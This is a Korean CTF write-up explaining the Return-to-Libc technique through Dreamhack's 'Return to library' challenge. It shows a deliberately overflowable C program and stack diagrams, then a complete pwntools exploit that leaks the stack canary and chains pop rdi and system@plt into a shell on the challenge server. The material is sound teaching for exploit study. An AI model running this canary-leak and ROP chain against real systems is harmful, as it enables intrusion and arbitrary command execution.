RTL(Return-to-Libc) 공격

📌 RTL이란?

스택에 NX(No eXecutable stack) 보안 기법이 적용되었을 때 사용하는 공격 기법이다.

📢 배경

NX 보안 기법은 "스택에서 코드 실행 불가"라는 제약 조건을 만들었고, 이로 인해 스택에서 shellcode를 삽입하고 RET 주소에 overwrite했던 'Return to Shellcode' 기법은 실패하게 된다.

📢 간단 동작 원리

1줄 요약

• 공유 라이브러리 함수의 주소를 가져와 RET에 overwrite하고 이를 호출하는 공격 기법 --> 스택에서 사용하는 것이 아닌 메모리에 적재되어 있는 라이브러리를 사용하는 것이기 때문에 NX 우회 가능

📢 예제 Write-up

해당 문제는 Dreamhack의 Return to library의 문제를 write-up 한 과정이다.

// Name: rtl.c
// Compile: gcc -o rtl rtl.c -fno-PIE -no-pie

#include <stdio.h>
#include <unistd.h>

const char* binsh = "/bin/sh";

int main() {
  char buf[0x30];

  setvbuf(stdin, 0, _IONBF, 0);
  setvbuf(stdout, 0, _IONBF, 0);

  // Add system function to plt's entry
  system("echo 'system@plt");

  // Leak canary
  printf("[1] Leak Canary\n");
  printf("Buf: ");
  read(0, buf, 0x100);
  printf("Buf: %s\n", buf);

  // Overwrite return address
  printf("[2] Overwrite return address\n");
  printf("Buf: ");
  read(0, buf, 0x100);

  return 0;
}

이 C코드를 보면 buf의 크기는 0x30인데 read할때는 0x100으로 읽는다. 이를 통해 BOF가 발생할 수 있고 이를 기반으로 우회 기법의 종류를 파악해야 한다.

해당 c코드의 응용 프로그램 파일에 사용된 기법을 보면 아래와 같다.

***@***-virtual-machine:~/바탕화면/dreamhack$ checksec ./rtl
[*] '/home/***/바탕화면/dreamhack/rtl'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

Canary와 NX기법이 적용되어있다.

// Leak canary
  printf("[1] Leak Canary\n");
  printf("Buf: ");
  read(0, buf, 0x100);
  printf("Buf: %s\n", buf);

이 코드를 통해 buf ~ canary+1까지 dummydata를 넣고 그 이후의 값을 읽어 들이면 canary의 값을 읽어들일 수 있을 것이다. 이를 통해 Canary 기법을 우회할 수 있다.

// Overwrite return address
  printf("[2] Overwrite return address\n");
  printf("Buf: ");
  read(0, buf, 0x100);

Canary값을 알았으면 이제 return to library 값을 입력한다. 정상적인 스택값과 RTL 공격을 위한 BOF 스택 구조를 비교하면 아래와 같다.

----------------------------
|       buf ( 48 bytes)    |
----------------------------
|       SFP ( 8 bytes)     |
----------------------------
|          RET             |
----------------------------
|          ....            |
----------------------------

----------------------------
|       buf (48 bytes)     |
----------------------------
|       Canary (8 bytes)   |
----------------------------
|       SFP (8 bytes)      |
----------------------------
|       RET (8 bytes)      |
----------------------------
|         /bin/sh          |
----------------------------

해당 RTL 관련 동작 원리는 아래 사이트에 가면 굉장히 자세하게 설명해준다. RTL 공격 기법의 원리를 이해하려면 leave와 ret 명령어를 잘 보면서 따라가기를 바란다. 아래는 Canary와 RTL 과정을 우회하기 위한 스택 구조를 그린 것이다.

--------------------------
|       'A' * 56        | --> buf (56 byte)
--------------------------
|    0x00 + canary      |
--------------------------
|       'B' * 8         |  --> SFP
--------------------------
|          ret          |
--------------------------
|     pop rdi; ret      |
--------------------------
|       "/bin/sh"       |
--------------------------
|     system@plt        |
--------------------------

이 때 'ret 없이 pop rdi; ret을 사용하면 되지 않을까?' 싶지만 스택은 0x10단위로 정렬되어야 한다. 정렬되지 않으면 'segmentation fault'가 일어난다.
따라서 해당 payload를 만들어서 pwntools를 이용해서 익스플로잇하면 성공적일 것으로 예상된다.

from pwn import *

# p = process('./rtl')
p = remote("host1.dreamhack.games",16424)
e = ELF('./rtl')
r = ROP(e)

def slog(name,addr): return success(': '.join([name,hex(addr)]))

# [1] Leak Canary
buf = b'A'*0x39
p.sendafter(b'Buf: ',buf)
p.recvuntil(buf)
canary = u64(b'\x00'+p.recvn(7))
slog('canary',canary)

# [2] address
system_plt = e.plt['system']
binsh = next(e.search(b'/bin/sh'))
pop_rdi = r.find_gadget(['pop rdi'])[0]
ret = r.find_gadget(['ret'])[0]
slog("system@plt",system_plt)
slog("/bin/sh",binsh)
slog("pop rdi",pop_rdi)
slog("ret",ret)

# [3] exploit
payload = b'A'*0x38 + p64(canary) + b'B' * 0x8
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system_plt)

p.sendafter(b'Buf: ',payload)

p.interactive()

해당 익스플로잇 코드를 이용해서 진행하면 아래와 같은 결과가 나온다.

'/home/***/바탕화면/dreamhack/rtl'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No
[*] Loaded 14 cached gadgets for './rtl'
[+] canary: 0x8debe702db062b00
[+] system@plt: 0x4005d0
[+] /bin/sh: 0x400874
[+] pop rdi: 0x400853
[+] ret: 0x400285
[*] Switching to interactive mode
$ ls
flag
rtl
run.sh

flag를 보면 DH값이 나온다.

---

RTL 원리를 이해하기 위해 참고했던 자료.

1. https://rninche01.tistory.com/entry/RTLReturn-To-Libc

해당 예제를 가장 잘 설명한 자료

1. https://jjeongsu.tistory.com/39